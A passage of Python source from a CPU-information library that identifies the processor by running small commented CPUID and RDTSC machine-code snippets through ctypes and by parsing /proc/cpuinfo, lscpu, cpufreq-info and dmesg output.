elif re.match('^sparc64$|^sun4u$|^sun4v$', arch_string_raw):
arch = 'SPARC_64'
bits = 64
# S390X
elif re.match('^s390x$', arch_string_raw):
arch = 'S390X'
bits = 64
return (arch, bits)
def _is_bit_set(reg, bit):
mask = 1 << bit
is_set = reg & mask > 0
return is_set
def _is_selinux_enforcing():
# Just return if the SE Linux Status Tool is not installed
if not DataSource.has_sestatus():
return False
# Run the sestatus, and just return if it failed to run
returncode, output = DataSource.sestatus_b()
if returncode != 0:
return False
# Figure out if explicitly in enforcing mode
for line in output.splitlines():
line = line.strip().lower()
if line.startswith("current mode:"):
if line.endswith("enforcing"):
return True
else:
return False
# Figure out if we can execute heap and execute memory
can_selinux_exec_heap = False
can_selinux_exec_memory = False
for line in output.splitlines():
line = line.strip().lower()
if line.startswith("allow_execheap") and line.endswith("on"):
can_selinux_exec_heap = True
elif line.startswith("allow_execmem") and line.endswith("on"):
can_selinux_exec_memory = True
return (not can_selinux_exec_heap or not can_selinux_exec_memory)
class CPUID(object):
def __init__(self):
self.prochandle = None
# Figure out if SE Linux is on and in enforcing mode
self.is_selinux_enforcing = _is_selinux_enforcing()
def _asm_func(self, restype=None, argtypes=(), byte_code=[]):
byte_code = bytes.join(b'', byte_code)
address = None
if DataSource.is_windows:
# Allocate a memory segment the size of the byte code, and make it executable
size = len(byte_code)
# Alloc at least 1 page to ensure we own all pages that we want to change protection on
if size < 0x1000: size = 0x1000
MEM_COMMIT = ctypes.c_ulong(0x1000)
PAGE_READWRITE = ctypes.c_ulong(0x4)
pfnVirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
pfnVirtualAlloc.restype = ctypes.c_void_p
address = pfnVirtualAlloc(None, ctypes.c_size_t(size), MEM_COMMIT, PAGE_READWRITE)
if not address:
raise Exception("Failed to VirtualAlloc")
# Copy the byte code into the memory segment
memmove = ctypes.CFUNCTYPE(ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t)(ctypes._memmove_addr)
if memmove(address, byte_code, size) < 0:
raise Exception("Failed to memmove")
# Enable execute permissions
PAGE_EXECUTE = ctypes.c_ulong(0x10)
old_protect = ctypes.c_ulong(0)
pfnVirtualProtect = ctypes.windll.kernel32.VirtualProtect
res = pfnVirtualProtect(ctypes.c_void_p(address), ctypes.c_size_t(size), PAGE_EXECUTE, ctypes.byref(old_protect))
if not res:
raise Exception("Failed VirtualProtect")
# Flush Instruction Cache
# First, get process Handle
if not self.prochandle:
pfnGetCurrentProcess = ctypes.windll.kernel32.GetCurrentProcess
pfnGetCurrentProcess.restype = ctypes.c_void_p
self.prochandle = ctypes.c_void_p(pfnGetCurrentProcess())
# Actually flush cache
res = ctypes.windll.kernel32.FlushInstructionCache(self.prochandle, ctypes.c_void_p(address), ctypes.c_size_t(size))
if not res:
raise Exception("Failed FlushInstructionCache")
else:
# Allocate a memory segment the size of the byte code
size = len(byte_code)
pfnvalloc = ctypes.pythonapi.valloc
pfnvalloc.restype = ctypes.c_void_p
address = pfnvalloc(ctypes.c_size_t(size))
if not address:
raise Exception("Failed to valloc")
# Mark the memory segment as writeable only
if not self.is_selinux_enforcing:
WRITE = 0x2
if ctypes.pythonapi.mprotect(ctypes.c_void_p(address), size, WRITE) < 0:
raise Exception("Failed to mprotect")
# Copy the byte code into the memory segment
if ctypes.pythonapi.memmove(ctypes.c_void_p(address), byte_code, ctypes.c_size_t(size)) < 0:
raise Exception("Failed to memmove")
# Mark the memory segment as writeable and executable only
if not self.is_selinux_enforcing:
WRITE_EXECUTE = 0x2 | 0x4
if ctypes.pythonapi.mprotect(ctypes.c_void_p(address), size, WRITE_EXECUTE) < 0:
raise Exception("Failed to mprotect")
# Cast the memory segment into a function
functype = ctypes.CFUNCTYPE(restype, *argtypes)
fun = functype(address)
return fun, address
def _run_asm(self, *byte_code):
# Convert the byte code into a function that returns an int
restype = ctypes.c_uint32
argtypes = ()
func, address = self._asm_func(restype, argtypes, byte_code)
# Call the byte code like a function
retval = func()
byte_code = bytes.join(b'', byte_code)
size = ctypes.c_size_t(len(byte_code))
# Free the function memory segment
if DataSource.is_windows:
MEM_RELEASE = ctypes.c_ulong(0x8000)
ctypes.windll.kernel32.VirtualFree(ctypes.c_void_p(address), ctypes.c_size_t(0), MEM_RELEASE)
else:
# Remove the executable tag on the memory
READ_WRITE = 0x1 | 0x2
if ctypes.pythonapi.mprotect(ctypes.c_void_p(address), size, READ_WRITE) < 0:
raise Exception("Failed to mprotect")
ctypes.pythonapi.free(ctypes.c_void_p(address))
return retval
# http://en.wikipedia.org/wiki/CPUID#EAX.3D0:_Get_vendor_ID
def get_vendor_id(self):
# EBX
ebx = self._run_asm(
b"\x31\xC0", # xor eax,eax
b"\x0F\xA2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
b"\x31\xC0", # xor eax,eax
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# EDX
edx = self._run_asm(
b"\x31\xC0", # xor eax,eax
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# Each 4bits is a ascii letter in the name
vendor_id = []
for reg in [ebx, edx, ecx]:
for n in [0, 8, 16, 24]:
vendor_id.append(chr((reg >> n) & 0xFF))
vendor_id = ''.join(vendor_id)
return vendor_id
# http://en.wikipedia.org/wiki/CPUID#EAX.3D1:_Processor_Info_and_Feature_Bits
def get_info(self):
# EAX
eax = self._run_asm(
b"\xB8\x01\x00\x00\x00", # mov eax,0x1"
b"\x0f\xa2" # cpuid
b"\xC3" # ret
)
# Get the CPU info
stepping = (eax >> 0) & 0xF # 4 bits
model = (eax >> 4) & 0xF # 4 bits
family = (eax >> 8) & 0xF # 4 bits
processor_type = (eax >> 12) & 0x3 # 2 bits
extended_model = (eax >> 16) & 0xF # 4 bits
extended_family = (eax >> 20) & 0xFF # 8 bits
return {
'stepping' : stepping,
'model' : model,
'family' : family,
'processor_type' : processor_type,
'extended_model' : extended_model,
'extended_family' : extended_family
}
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000000h:_Get_Highest_Extended_Function_Supported
def get_max_extension_support(self):
# Check for extension support
max_extension_support = self._run_asm(
b"\xB8\x00\x00\x00\x80" # mov ax,0x80000000
b"\x0f\xa2" # cpuid
b"\xC3" # ret
)
return max_extension_support
# http://en.wikipedia.org/wiki/CPUID#EAX.3D1:_Processor_Info_and_Feature_Bits
def get_flags(self, max_extension_support):
# EDX
edx = self._run_asm(
b"\xB8\x01\x00\x00\x00", # mov eax,0x1"
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
b"\xB8\x01\x00\x00\x00", # mov eax,0x1"
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the CPU flags
flags = {
'fpu' : _is_bit_set(edx, 0),
'vme' : _is_bit_set(edx, 1),
'de' : _is_bit_set(edx, 2),
'pse' : _is_bit_set(edx, 3),
'tsc' : _is_bit_set(edx, 4),
'msr' : _is_bit_set(edx, 5),
'pae' : _is_bit_set(edx, 6),
'mce' : _is_bit_set(edx, 7),
'cx8' : _is_bit_set(edx, 8),
'apic' : _is_bit_set(edx, 9),
#'reserved1' : _is_bit_set(edx, 10),
'sep' : _is_bit_set(edx, 11),
'mtrr' : _is_bit_set(edx, 12),
'pge' : _is_bit_set(edx, 13),
'mca' : _is_bit_set(edx, 14),
'cmov' : _is_bit_set(edx, 15),
'pat' : _is_bit_set(edx, 16),
'pse36' : _is_bit_set(edx, 17),
'pn' : _is_bit_set(edx, 18),
'clflush' : _is_bit_set(edx, 19),
#'reserved2' : _is_bit_set(edx, 20),
'dts' : _is_bit_set(edx, 21),
'acpi' : _is_bit_set(edx, 22),
'mmx' : _is_bit_set(edx, 23),
'fxsr' : _is_bit_set(edx, 24),
'sse' : _is_bit_set(edx, 25),
'sse2' : _is_bit_set(edx, 26),
'ss' : _is_bit_set(edx, 27),
'ht' : _is_bit_set(edx, 28),
'tm' : _is_bit_set(edx, 29),
'ia64' : _is_bit_set(edx, 30),
'pbe' : _is_bit_set(edx, 31),
'pni' : _is_bit_set(ecx, 0),
'pclmulqdq' : _is_bit_set(ecx, 1),
'dtes64' : _is_bit_set(ecx, 2),
'monitor' : _is_bit_set(ecx, 3),
'ds_cpl' : _is_bit_set(ecx, 4),
'vmx' : _is_bit_set(ecx, 5),
'smx' : _is_bit_set(ecx, 6),
'est' : _is_bit_set(ecx, 7),
'tm2' : _is_bit_set(ecx, 8),
'ssse3' : _is_bit_set(ecx, 9),
'cid' : _is_bit_set(ecx, 10),
#'reserved3' : _is_bit_set(ecx, 11),
'fma' : _is_bit_set(ecx, 12),
'cx16' : _is_bit_set(ecx, 13),
'xtpr' : _is_bit_set(ecx, 14),
'pdcm' : _is_bit_set(ecx, 15),
#'reserved4' : _is_bit_set(ecx, 16),
'pcid' : _is_bit_set(ecx, 17),
'dca' : _is_bit_set(ecx, 18),
'sse4_1' : _is_bit_set(ecx, 19),
'sse4_2' : _is_bit_set(ecx, 20),
'x2apic' : _is_bit_set(ecx, 21),
'movbe' : _is_bit_set(ecx, 22),
'popcnt' : _is_bit_set(ecx, 23),
'tscdeadline' : _is_bit_set(ecx, 24),
'aes' : _is_bit_set(ecx, 25),
'xsave' : _is_bit_set(ecx, 26),
'osxsave' : _is_bit_set(ecx, 27),
'avx' : _is_bit_set(ecx, 28),
'f16c' : _is_bit_set(ecx, 29),
'rdrnd' : _is_bit_set(ecx, 30),
'hypervisor' : _is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
# http://en.wikipedia.org/wiki/CPUID#EAX.3D7.2C_ECX.3D0:_Extended_Features
if max_extension_support >= 7:
# EBX
ebx = self._run_asm(
b"\x31\xC9", # xor ecx,ecx
b"\xB8\x07\x00\x00\x00" # mov eax,7
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
b"\x31\xC9", # xor ecx,ecx
b"\xB8\x07\x00\x00\x00" # mov eax,7
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the extended CPU flags
extended_flags = {
#'fsgsbase' : _is_bit_set(ebx, 0),
#'IA32_TSC_ADJUST' : _is_bit_set(ebx, 1),
'sgx' : _is_bit_set(ebx, 2),
'bmi1' : _is_bit_set(ebx, 3),
'hle' : _is_bit_set(ebx, 4),
'avx2' : _is_bit_set(ebx, 5),
#'reserved' : _is_bit_set(ebx, 6),
'smep' : _is_bit_set(ebx, 7),
'bmi2' : _is_bit_set(ebx, 8),
'erms' : _is_bit_set(ebx, 9),
'invpcid' : _is_bit_set(ebx, 10),
'rtm' : _is_bit_set(ebx, 11),
'pqm' : _is_bit_set(ebx, 12),
#'FPU CS and FPU DS deprecated' : _is_bit_set(ebx, 13),
'mpx' : _is_bit_set(ebx, 14),
'pqe' : _is_bit_set(ebx, 15),
'avx512f' : _is_bit_set(ebx, 16),
'avx512dq' : _is_bit_set(ebx, 17),
'rdseed' : _is_bit_set(ebx, 18),
'adx' : _is_bit_set(ebx, 19),
'smap' : _is_bit_set(ebx, 20),
'avx512ifma' : _is_bit_set(ebx, 21),
'pcommit' : _is_bit_set(ebx, 22),
'clflushopt' : _is_bit_set(ebx, 23),
'clwb' : _is_bit_set(ebx, 24),
'intel_pt' : _is_bit_set(ebx, 25),
'avx512pf' : _is_bit_set(ebx, 26),
'avx512er' : _is_bit_set(ebx, 27),
'avx512cd' : _is_bit_set(ebx, 28),
'sha' : _is_bit_set(ebx, 29),
'avx512bw' : _is_bit_set(ebx, 30),
'avx512vl' : _is_bit_set(ebx, 31),
'prefetchwt1' : _is_bit_set(ecx, 0),
'avx512vbmi' : _is_bit_set(ecx, 1),
'umip' : _is_bit_set(ecx, 2),
'pku' : _is_bit_set(ecx, 3),
'ospke' : _is_bit_set(ecx, 4),
#'reserved' : _is_bit_set(ecx, 5),
'avx512vbmi2' : _is_bit_set(ecx, 6),
#'reserved' : _is_bit_set(ecx, 7),
'gfni' : _is_bit_set(ecx, 8),
'vaes' : _is_bit_set(ecx, 9),
'vpclmulqdq' : _is_bit_set(ecx, 10),
'avx512vnni' : _is_bit_set(ecx, 11),
'avx512bitalg' : _is_bit_set(ecx, 12),
#'reserved' : _is_bit_set(ecx, 13),
'avx512vpopcntdq' : _is_bit_set(ecx, 14),
#'reserved' : _is_bit_set(ecx, 15),
#'reserved' : _is_bit_set(ecx, 16),
#'mpx0' : _is_bit_set(ecx, 17),
#'mpx1' : _is_bit_set(ecx, 18),
#'mpx2' : _is_bit_set(ecx, 19),
#'mpx3' : _is_bit_set(ecx, 20),
#'mpx4' : _is_bit_set(ecx, 21),
'rdpid' : _is_bit_set(ecx, 22),
#'reserved' : _is_bit_set(ecx, 23),
#'reserved' : _is_bit_set(ecx, 24),
#'reserved' : _is_bit_set(ecx, 25),
#'reserved' : _is_bit_set(ecx, 26),
#'reserved' : _is_bit_set(ecx, 27),
#'reserved' : _is_bit_set(ecx, 28),
#'reserved' : _is_bit_set(ecx, 29),
'sgx_lc' : _is_bit_set(ecx, 30),
#'reserved' : _is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
extended_flags = [k for k, v in extended_flags.items() if v]
flags += extended_flags
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000001h:_Extended_Processor_Info_and_Feature_Bits
if max_extension_support >= 0x80000001:
# EBX
ebx = self._run_asm(
b"\xB8\x01\x00\x00\x80" # mov ax,0x80000001
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
b"\xB8\x01\x00\x00\x80" # mov ax,0x80000001
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the extended CPU flags
extended_flags = {
'fpu' : _is_bit_set(ebx, 0),
'vme' : _is_bit_set(ebx, 1),
'de' : _is_bit_set(ebx, 2),
'pse' : _is_bit_set(ebx, 3),
'tsc' : _is_bit_set(ebx, 4),
'msr' : _is_bit_set(ebx, 5),
'pae' : _is_bit_set(ebx, 6),
'mce' : _is_bit_set(ebx, 7),
'cx8' : _is_bit_set(ebx, 8),
'apic' : _is_bit_set(ebx, 9),
#'reserved' : _is_bit_set(ebx, 10),
'syscall' : _is_bit_set(ebx, 11),
'mtrr' : _is_bit_set(ebx, 12),
'pge' : _is_bit_set(ebx, 13),
'mca' : _is_bit_set(ebx, 14),
'cmov' : _is_bit_set(ebx, 15),
'pat' : _is_bit_set(ebx, 16),
'pse36' : _is_bit_set(ebx, 17),
#'reserved' : _is_bit_set(ebx, 18),
'mp' : _is_bit_set(ebx, 19),
'nx' : _is_bit_set(ebx, 20),
#'reserved' : _is_bit_set(ebx, 21),
'mmxext' : _is_bit_set(ebx, 22),
'mmx' : _is_bit_set(ebx, 23),
'fxsr' : _is_bit_set(ebx, 24),
'fxsr_opt' : _is_bit_set(ebx, 25),
'pdpe1gp' : _is_bit_set(ebx, 26),
'rdtscp' : _is_bit_set(ebx, 27),
#'reserved' : _is_bit_set(ebx, 28),
'lm' : _is_bit_set(ebx, 29),
'3dnowext' : _is_bit_set(ebx, 30),
'3dnow' : _is_bit_set(ebx, 31),
'lahf_lm' : _is_bit_set(ecx, 0),
'cmp_legacy' : _is_bit_set(ecx, 1),
'svm' : _is_bit_set(ecx, 2),
'extapic' : _is_bit_set(ecx, 3),
'cr8_legacy' : _is_bit_set(ecx, 4),
'abm' : _is_bit_set(ecx, 5),
'sse4a' : _is_bit_set(ecx, 6),
'misalignsse' : _is_bit_set(ecx, 7),
'3dnowprefetch' : _is_bit_set(ecx, 8),
'osvw' : _is_bit_set(ecx, 9),
'ibs' : _is_bit_set(ecx, 10),
'xop' : _is_bit_set(ecx, 11),
'skinit' : _is_bit_set(ecx, 12),
'wdt' : _is_bit_set(ecx, 13),
#'reserved' : _is_bit_set(ecx, 14),
'lwp' : _is_bit_set(ecx, 15),
'fma4' : _is_bit_set(ecx, 16),
'tce' : _is_bit_set(ecx, 17),
#'reserved' : _is_bit_set(ecx, 18),
'nodeid_msr' : _is_bit_set(ecx, 19),
#'reserved' : _is_bit_set(ecx, 20),
'tbm' : _is_bit_set(ecx, 21),
'topoext' : _is_bit_set(ecx, 22),
'perfctr_core' : _is_bit_set(ecx, 23),
'perfctr_nb' : _is_bit_set(ecx, 24),
#'reserved' : _is_bit_set(ecx, 25),
'dbx' : _is_bit_set(ecx, 26),
'perftsc' : _is_bit_set(ecx, 27),
'pci_l2i' : _is_bit_set(ecx, 28),
#'reserved' : _is_bit_set(ecx, 29),
#'reserved' : _is_bit_set(ecx, 30),
#'reserved' : _is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
extended_flags = [k for k, v in extended_flags.items() if v]
flags += extended_flags
flags.sort()
return flags
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000002h.2C80000003h.2C80000004h:_Processor_Brand_String
def get_processor_brand(self, max_extension_support):
processor_brand = ""
# Processor brand string
if max_extension_support >= 0x80000004:
instructions = [
b"\xB8\x02\x00\x00\x80", # mov ax,0x80000002
b"\xB8\x03\x00\x00\x80", # mov ax,0x80000003
b"\xB8\x04\x00\x00\x80" # mov ax,0x80000004
]
for instruction in instructions:
# EAX
eax = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xC0" # mov ax,ax
b"\xC3" # ret
)
# EBX
ebx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# EDX
edx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# Combine each of the 4 bytes in each register into the string
for reg in [eax, ebx, ecx, edx]:
for n in [0, 8, 16, 24]:
processor_brand += chr((reg >> n) & 0xFF)
# Strip off any trailing NULL terminators and white space
processor_brand = processor_brand.strip("\0").strip()
return processor_brand
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000006h:_Extended_L2_Cache_Features
def get_cache(self, max_extension_support):
cache_info = {}
# Just return if the cache feature is not supported
if max_extension_support < 0x80000006:
return cache_info
# ECX
ecx = self._run_asm(
b"\xB8\x06\x00\x00\x80" # mov ax,0x80000006
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
cache_info = {
'size_kb' : ecx & 0xFF,
'line_size_b' : (ecx >> 12) & 0xF,
'associativity' : (ecx >> 16) & 0xFFFF
}
return cache_info
def get_ticks(self):
retval = None
if DataSource.bits == '32bit':
# Works on x86_32
restype = None
argtypes = (ctypes.POINTER(ctypes.c_uint), ctypes.POINTER(ctypes.c_uint))
get_ticks_x86_32, address = self._asm_func(restype, argtypes,
[
b"\x55", # push bp
b"\x89\xE5", # mov bp,sp
b"\x31\xC0", # xor ax,ax
b"\x0F\xA2", # cpuid
b"\x0F\x31", # rdtsc
b"\x8B\x5D\x08", # mov bx,[di+0x8]
b"\x8B\x4D\x0C", # mov cx,[di+0xc]
b"\x89\x13", # mov [bp+di],dx
b"\x89\x01", # mov [bx+di],ax
b"\x5D", # pop bp
b"\xC3" # ret
]
)
high = ctypes.c_uint32(0)
low = ctypes.c_uint32(0)
get_ticks_x86_32(ctypes.byref(high), ctypes.byref(low))
retval = ((high.value << 32) & 0xFFFFFFFF00000000) | low.value
elif DataSource.bits == '64bit':
# Works on x86_64
restype = ctypes.c_uint64
argtypes = ()
get_ticks_x86_64, address = self._asm_func(restype, argtypes,
[
b"\x48", # dec ax
b"\x31\xC0", # xor ax,ax
b"\x0F\xA2", # cpuid
b"\x0F\x31", # rdtsc
b"\x48", # dec ax
b"\xC1\xE2\x20", # shl dx,byte 0x20
b"\x48", # dec ax
b"\x09\xD0", # or ax,dx
b"\xC3", # ret
]
)
retval = get_ticks_x86_64()
return retval
def get_raw_hz(self):
import time
start = self.get_ticks()
time.sleep(1)
end = self.get_ticks()
ticks = (end - start)
return ticks
def _get_cpu_info_from_cpuid_actual():
'''
Warning! This function has the potential to crash the Python runtime.
Do not call it directly. Use the _get_cpu_info_from_cpuid function instead.
It will safely call this function in another process.
'''
# Get the CPU arch and bits
arch, bits = _parse_arch(DataSource.arch_string_raw)
# Return none if this is not an X86 CPU
if not arch in ['X86_32', 'X86_64']:
return {}
# Return none if SE Linux is in enforcing mode
cpuid = CPUID()
if cpuid.is_selinux_enforcing:
return {}
# Get the cpu info from the CPUID register
max_extension_support = cpuid.get_max_extension_support()
cache_info = cpuid.get_cache(max_extension_support)
info = cpuid.get_info()
processor_brand = cpuid.get_processor_brand(max_extension_support)
# Get the Hz and scale
hz_actual = cpuid.get_raw_hz()
hz_actual = _to_decimal_string(hz_actual)
# Get the Hz and scale
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
info = {
'vendor_id_raw' : cpuid.get_vendor_id(),
'hardware_raw' : '',
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, 0),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, 0),
'l2_cache_size' : _to_friendly_bytes(cache_info['size_kb']),
'l2_cache_line_size' : cache_info['line_size_b'],
'l2_cache_associativity' : hex(cache_info['associativity']),
'stepping' : info['stepping'],
'model' : info['model'],
'family' : info['family'],
'processor_type' : info['processor_type'],
'extended_model' : info['extended_model'],
'extended_family' : info['extended_family'],
'flags' : cpuid.get_flags(max_extension_support)
}
info = {k: v for k, v in info.items() if v}
return info
def _get_cpu_info_from_cpuid_subprocess_wrapper(queue):
# Pipe all output to nothing
sys.stdout = open(os.devnull, 'w')
sys.stderr = open(os.devnull, 'w')
info = _get_cpu_info_from_cpuid_actual()
queue.put(_obj_to_b64(info))
def _get_cpu_info_from_cpuid():
'''
Returns the CPU info gathered by querying the X86 cpuid register in a new process.
Returns {} on non X86 cpus.
Returns {} if SELinux is in enforcing mode.
'''
from multiprocessing import Process, Queue
# Return {} if can't cpuid
if not DataSource.can_cpuid:
return {}
# Get the CPU arch and bits
arch, bits = _parse_arch(DataSource.arch_string_raw)
# Return {} if this is not an X86 CPU
if not arch in ['X86_32', 'X86_64']:
return {}
try:
if CAN_CALL_CPUID_IN_SUBPROCESS:
# Start running the function in a subprocess
queue = Queue()
p = Process(target=_get_cpu_info_from_cpuid_subprocess_wrapper, args=(queue,))
p.start()
# Wait for the process to end, while it is still alive
while p.is_alive():
p.join(0)
# Return {} if it failed
if p.exitcode != 0:
return {}
# Return the result, only if there is something to read
if not queue.empty():
output = queue.get()
return _b64_to_obj(output)
else:
return _get_cpu_info_from_cpuid_actual()
except:
pass
# Return {} if everything failed
return {}
def _get_cpu_info_from_proc_cpuinfo():
'''
Returns the CPU info gathered from /proc/cpuinfo.
Returns {} if /proc/cpuinfo is not found.
'''
try:
# Just return {} if there is no cpuinfo
if not DataSource.has_proc_cpuinfo():
return {}
returncode, output = DataSource.cat_proc_cpuinfo()
if returncode != 0:
return {}
# Various fields
vendor_id = _get_field(False, output, None, '', 'vendor_id', 'vendor id', 'vendor')
processor_brand = _get_field(True, output, None, None, 'model name','cpu', 'processor')
cache_size = _get_field(False, output, None, '', 'cache size')
stepping = _get_field(False, output, int, 0, 'stepping')
model = _get_field(False, output, int, 0, 'model')
family = _get_field(False, output, int, 0, 'cpu family')
hardware = _get_field(False, output, None, '', 'Hardware')
# Flags
flags = _get_field(False, output, None, None, 'flags', 'Features')
if flags:
flags = flags.split()
flags.sort()
# Check for other cache format
if not cache_size:
try:
for i in range(0, 10):
name = "cache{0}".format(i)
value = _get_field(False, output, None, None, name)
if value:
value = [entry.split('=') for entry in value.split(' ')]
value = dict(value)
if 'level' in value and value['level'] == '3' and 'size' in value:
cache_size = value['size']
break
except Exception:
pass
# Convert from MHz string to Hz
hz_actual = _get_field(False, output, None, '', 'cpu MHz', 'cpu speed', 'clock', 'cpu MHz dynamic', 'cpu MHz static')
hz_actual = hz_actual.lower().rstrip('mhz').strip()
hz_actual = _to_decimal_string(hz_actual)
# Convert from GHz/MHz string to Hz
hz_advertised, scale = (None, 0)
try:
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
except Exception:
pass
info = {
'hardware_raw' : hardware,
'brand_raw' : processor_brand,
'l3_cache_size' : _to_friendly_bytes(cache_size),
'flags' : flags,
'vendor_id_raw' : vendor_id,
'stepping' : stepping,
'model' : model,
'family' : family,
}
# Make the Hz the same for actual and advertised if missing any
if not hz_advertised or hz_advertised == '0.0':
hz_advertised = hz_actual
scale = 6
elif not hz_actual or hz_actual == '0.0':
hz_actual = hz_advertised
# Add the Hz if there is one
if _hz_short_to_full(hz_advertised, scale) > (0, 0):
info['hz_advertised_friendly'] = _hz_short_to_friendly(hz_advertised, scale)
info['hz_advertised'] = _hz_short_to_full(hz_advertised, scale)
if _hz_short_to_full(hz_actual, scale) > (0, 0):
info['hz_actual_friendly'] = _hz_short_to_friendly(hz_actual, 6)
info['hz_actual'] = _hz_short_to_full(hz_actual, 6)
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_cpufreq_info():
'''
Returns the CPU info gathered from cpufreq-info.
Returns {} if cpufreq-info is not found.
'''
try:
hz_brand, scale = '0.0', 0
if not DataSource.has_cpufreq_info():
return {}
returncode, output = DataSource.cpufreq_info()
if returncode != 0:
return {}
hz_brand = output.split('current CPU frequency is')[1].split('\n')[0]
i = hz_brand.find('Hz')
assert(i != -1)
hz_brand = hz_brand[0 : i+2].strip().lower()
if hz_brand.endswith('mhz'):
scale = 6
elif hz_brand.endswith('ghz'):
scale = 9
hz_brand = hz_brand.rstrip('mhz').rstrip('ghz').strip()
hz_brand = _to_decimal_string(hz_brand)
info = {
'hz_advertised_friendly' : _hz_short_to_friendly(hz_brand, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_brand, scale),
'hz_advertised' : _hz_short_to_full(hz_brand, scale),
'hz_actual' : _hz_short_to_full(hz_brand, scale),
}
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_lscpu():
'''
Returns the CPU info gathered from lscpu.
Returns {} if lscpu is not found.
'''
try:
if not DataSource.has_lscpu():
return {}
returncode, output = DataSource.lscpu()
if returncode != 0:
return {}
info = {}
new_hz = _get_field(False, output, None, None, 'CPU max MHz', 'CPU MHz')
if new_hz:
new_hz = _to_decimal_string(new_hz)
scale = 6
info['hz_advertised_friendly'] = _hz_short_to_friendly(new_hz, scale)
info['hz_actual_friendly'] = _hz_short_to_friendly(new_hz, scale)
info['hz_advertised'] = _hz_short_to_full(new_hz, scale)
info['hz_actual'] = _hz_short_to_full(new_hz, scale)
new_hz = _get_field(False, output, None, None, 'CPU dynamic MHz', 'CPU static MHz')
if new_hz:
new_hz = _to_decimal_string(new_hz)
scale = 6
info['hz_advertised_friendly'] = _hz_short_to_friendly(new_hz, scale)
info['hz_actual_friendly'] = _hz_short_to_friendly(new_hz, scale)
info['hz_advertised'] = _hz_short_to_full(new_hz, scale)
info['hz_actual'] = _hz_short_to_full(new_hz, scale)
vendor_id = _get_field(False, output, None, None, 'Vendor ID')
if vendor_id:
info['vendor_id_raw'] = vendor_id
brand = _get_field(False, output, None, None, 'Model name')
if brand:
info['brand_raw'] = brand
family = _get_field(False, output, None, None, 'CPU family')
if family and family.isdigit():
info['family'] = int(family)
stepping = _get_field(False, output, None, None, 'Stepping')
if stepping and stepping.isdigit():
info['stepping'] = int(stepping)
model = _get_field(False, output, None, None, 'Model')
if model and model.isdigit():
info['model'] = int(model)
l1_data_cache_size = _get_field(False, output, None, None, 'L1d cache')
if l1_data_cache_size:
info['l1_data_cache_size'] = _to_friendly_bytes(l1_data_cache_size)
l1_instruction_cache_size = _get_field(False, output, None, None, 'L1i cache')
if l1_instruction_cache_size:
info['l1_instruction_cache_size'] = _to_friendly_bytes(l1_instruction_cache_size)
l2_cache_size = _get_field(False, output, None, None, 'L2 cache', 'L2d cache')
if l2_cache_size:
info['l2_cache_size'] = _to_friendly_bytes(l2_cache_size)
l3_cache_size = _get_field(False, output, None, None, 'L3 cache')
if l3_cache_size:
info['l3_cache_size'] = _to_friendly_bytes(l3_cache_size)
# Flags
flags = _get_field(False, output, None, None, 'flags', 'Features')
if flags:
flags = flags.split()
flags.sort()
info['flags'] = flags
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_dmesg():
'''
Returns the CPU info gathered from dmesg.
Returns {} if dmesg is not found or does not have the desired info.
'''
# Just return {} if this arch has an unreliable dmesg log
arch, bits = _parse_arch(DataSource.arch_string_raw)
if arch in ['S390X']:
return {}
# Just return {} if there is no dmesg
if not DataSource.has_dmesg():
return {}
# If dmesg fails return {}
returncode, output = DataSource.dmesg_a()
if output == None or returncode != 0:
return {}
return _parse_dmesg_output(output)
# https://openpowerfoundation.org/wp-content/uploads/2016/05/LoPAPR_DRAFT_v11_24March2016_cmt1.pdf
# page 767
def _get_cpu_info_from_ibm_pa_features():
'''
Returns the CPU info gathered from lsprop /proc/device-tree/cpus/*/ibm,pa-features
